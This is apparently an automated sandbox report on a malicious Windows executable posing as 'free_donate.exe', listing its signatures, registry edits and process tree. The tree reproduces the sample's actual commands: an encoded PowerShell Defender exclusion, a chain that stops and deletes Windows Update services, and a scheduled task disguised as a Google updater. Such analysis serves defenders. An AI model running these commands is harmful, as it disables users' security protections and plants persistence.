hxxps://github[.]com/Cteklooo/u/blob/main/free_donate[.]exe

Analysis

max time kernel
56s
max time network
155s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 11:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/Cteklooo/u/blob/main/free_donate.exe

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 2044 created 420 2044 powershell.EXE winlogon.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

free_donate.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts free_donate.exe
Executes dropped EXE 2 IoCs

Processes:

free_donate.exeupdater.exe

pid process

860 free_donate.exe
1080 updater.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1720 takeown.exe
516 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 2 IoCs

Processes:

iexplore.exetaskeng.exe

pid process

1768 iexplore.exe
624 taskeng.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1720 takeown.exe
516 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

26 ip-api.com

description	pid	process	target process
PID 2044 created 420	2044	powershell.EXE	winlogon.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	free_donate.exe

pid	process
860	free_donate.exe
1080	updater.exe

pid	process
1720	takeown.exe
516	icacls.exe

pid	process
1768	iexplore.exe
624	taskeng.exe

pid	process
1720	takeown.exe
516	icacls.exe

flow	ioc
26	ip-api.com

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

Processes:

free_donate.exepowershell.EXE

description	pid	process	target process
PID 860 set thread context of 1092	860	free_donate.exe	conhost.exe
PID 2044 set thread context of 1684	2044	powershell.EXE	dllhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

free_donate.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	free_donate.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	free_donate.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1204 sc.exe
1464 sc.exe
1824 sc.exe
840 sc.exe
1080 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1912 schtasks.exe

pid	process
1204	sc.exe
1464	sc.exe
1824	sc.exe
840	sc.exe
1080	sc.exe

pid	process
1912	schtasks.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d07e66cb31ffd801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a01b09da31ffd801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000b195417408c688ea4978109021074f20d59af7aa20ac1dfe9ef82a1f42160da6000000000e8000000002000020000000275fd5e8bd4c90b3395e69d2f06cb99e205ba5613c7806b48ddd758ce4de26ce20000000e23f435540e0f8f29d87043a94391dae47298c921810202c49552db19a14d7ea400000007d40a483599bbb4b73cd1134d3a00bb2518e0f54c9dcde48a50351533861a992354f7bda808352846ed7957cc02b4f29292b39f652d0b01f84a70ab302ffa7b2	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FE6F38D1-6B24-11ED-AD07-6AC8E2464E73} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000048ca5449a4d21846ba8a995ea0abd35a00000000020000000000106600000001000020000000ff142cfa21535b5abde78de2a0512522fc5945aad34754f52fe61d116bb0d51d000000000e80000000020000200000006f28901e68834934406d80d36dc72d290582311dfc797efb86aab39f376d5e24900000007a3ba8b9bcfede51a23d982e65ab82d9ce3865f5ca3cf0d82d6f819d86fa47160fbae813ae4e4e04561b75b2b1e0c9f6a449e871522bd4568b873e6580ff1bd16df738ce9c5c6822e69939c5838ef035ba35a5e8f0545067dcfbaf0a007d76f053a1ac4eb498016f93a3659359f501b23eb24dd6aa6dd2948ea3d220ac059de65fa7369324b68130d7dabd7f9567abf540000000d37dbb6040a73bfc640739a3eb71a352f4eba48cea32e752e890d0e7c60f69dda60702b890a3a665190ac2b8319225f654380250a42584e9734e131383b10c06	iexplore.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b08c4adb31ffd801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1596 reg.exe
1912 reg.exe
1596 reg.exe
1676 reg.exe
1584 reg.exe
1516 reg.exe
1192 reg.exe
1800 reg.exe
1308 reg.exe

pid	process
1596	reg.exe
1912	reg.exe
1596	reg.exe
1676	reg.exe
1584	reg.exe
1516	reg.exe
1192	reg.exe
1800	reg.exe
1308	reg.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exefree_donate.exepowershell.EXEdllhost.exepowershell.EXE

pid	process
364	powershell.exe
860	free_donate.exe
2044	powershell.EXE
2044	powershell.EXE
1684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
1684	dllhost.exe
1632	powershell.EXE

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

powershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exefree_donate.exepowershell.EXEdllhost.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	364	powershell.exe
Token: SeShutdownPrivilege	1908	powercfg.exe
Token: SeShutdownPrivilege	1600	powercfg.exe
Token: SeShutdownPrivilege	1588	powercfg.exe
Token: SeShutdownPrivilege	1944	powercfg.exe
Token: SeTakeOwnershipPrivilege	1720	takeown.exe
Token: SeDebugPrivilege	860	free_donate.exe
Token: SeDebugPrivilege	2044	powershell.EXE
Token: SeDebugPrivilege	2044	powershell.EXE
Token: SeDebugPrivilege	1684	dllhost.exe
Token: SeDebugPrivilege	1632	powershell.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

1768 iexplore.exe
1768 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

1768 iexplore.exe
1768 iexplore.exe
524 IEXPLORE.EXE
524 IEXPLORE.EXE
524 IEXPLORE.EXE
524 IEXPLORE.EXE

pid	process
1768	iexplore.exe
1768	iexplore.exe

pid	process
1768	iexplore.exe
1768	iexplore.exe
524	IEXPLORE.EXE
524	IEXPLORE.EXE
524	IEXPLORE.EXE
524	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exefree_donate.execmd.execmd.exe

description	pid	process	target process
PID 1768 wrote to memory of 524	1768	iexplore.exe	IEXPLORE.EXE
PID 1768 wrote to memory of 524	1768	iexplore.exe	IEXPLORE.EXE
PID 1768 wrote to memory of 524	1768	iexplore.exe	IEXPLORE.EXE
PID 1768 wrote to memory of 524	1768	iexplore.exe	IEXPLORE.EXE
PID 1768 wrote to memory of 860	1768	iexplore.exe	free_donate.exe
PID 1768 wrote to memory of 860	1768	iexplore.exe	free_donate.exe
PID 1768 wrote to memory of 860	1768	iexplore.exe	free_donate.exe
PID 860 wrote to memory of 364	860	free_donate.exe	powershell.exe
PID 860 wrote to memory of 364	860	free_donate.exe	powershell.exe
PID 860 wrote to memory of 364	860	free_donate.exe	powershell.exe
PID 860 wrote to memory of 240	860	free_donate.exe	cmd.exe
PID 860 wrote to memory of 240	860	free_donate.exe	cmd.exe
PID 860 wrote to memory of 240	860	free_donate.exe	cmd.exe
PID 860 wrote to memory of 1524	860	free_donate.exe	cmd.exe
PID 860 wrote to memory of 1524	860	free_donate.exe	cmd.exe
PID 860 wrote to memory of 1524	860	free_donate.exe	cmd.exe
PID 240 wrote to memory of 1204	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1204	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1204	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1464	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1464	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1464	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1824	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1824	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1824	240	cmd.exe	sc.exe
PID 1524 wrote to memory of 1908	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1908	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1908	1524	cmd.exe	powercfg.exe
PID 240 wrote to memory of 840	240	cmd.exe	sc.exe
PID 240 wrote to memory of 840	240	cmd.exe	sc.exe
PID 240 wrote to memory of 840	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1080	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1080	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1080	240	cmd.exe	sc.exe
PID 240 wrote to memory of 1584	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1584	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1584	240	cmd.exe	reg.exe
PID 1524 wrote to memory of 1600	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1600	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1600	1524	cmd.exe	powercfg.exe
PID 240 wrote to memory of 1596	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1596	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1596	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1516	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1516	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1516	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1192	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1192	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1192	240	cmd.exe	reg.exe
PID 1524 wrote to memory of 1588	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1588	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1588	1524	cmd.exe	powercfg.exe
PID 240 wrote to memory of 1800	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1800	240	cmd.exe	reg.exe
PID 240 wrote to memory of 1800	240	cmd.exe	reg.exe
PID 1524 wrote to memory of 1944	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1944	1524	cmd.exe	powercfg.exe
PID 1524 wrote to memory of 1944	1524	cmd.exe	powercfg.exe
PID 240 wrote to memory of 1720	240	cmd.exe	takeown.exe
PID 240 wrote to memory of 1720	240	cmd.exe	takeown.exe
PID 240 wrote to memory of 1720	240	cmd.exe	takeown.exe
PID 240 wrote to memory of 516	240	cmd.exe	icacls.exe
PID 240 wrote to memory of 516	240	cmd.exe	icacls.exe
PID 240 wrote to memory of 516	240	cmd.exe	icacls.exe

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:464

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3dc39c30-eea5-4ee4-9c53-ab48b53be9c7}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{7082241c-483e-42e2-a0a2-69beb21e4cab}
2⤵
PID:2700

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/Cteklooo/u/blob/main/free_donate.exe
1⤵
- Loads dropped DLL
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1768

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1768 CREDAT:275457 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:524

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate.exe"
2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:240

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:1204

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1464

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1824

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:840

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:1080

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:1584

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:1596

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:1516

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1192

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:1800

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:516

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1912

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1596

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1308

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1676

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:1732

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:1308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:1684

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:1912

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1596

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:1308

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:1676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1944

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:1092

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
3⤵
PID:1696

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""
4⤵
- Creates scheduled task(s)
PID:1912

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
3⤵
PID:1720

C:\Windows\system32\schtasks.exe
schtasks /run /tn "GoogleUpdateTaskMachineQC"
4⤵
PID:1624

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PXJIW9HP\free_donate.exe"
3⤵
PID:820

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
4⤵
PID:1084

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\free_donate.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z4TAQ562\free_donate.exe"
2⤵
PID:1752

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAZgBxACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdwBhAG0AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegB5AGQAaQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAHUAbAAjAD4A"
3⤵
PID:2160

C:\Windows\system32\taskeng.exe
taskeng.exe {D9BE4043-18C9-48FB-B93A-3BA071D0BFCD} S-1-5-18:NT AUTHORITY\System:Service:
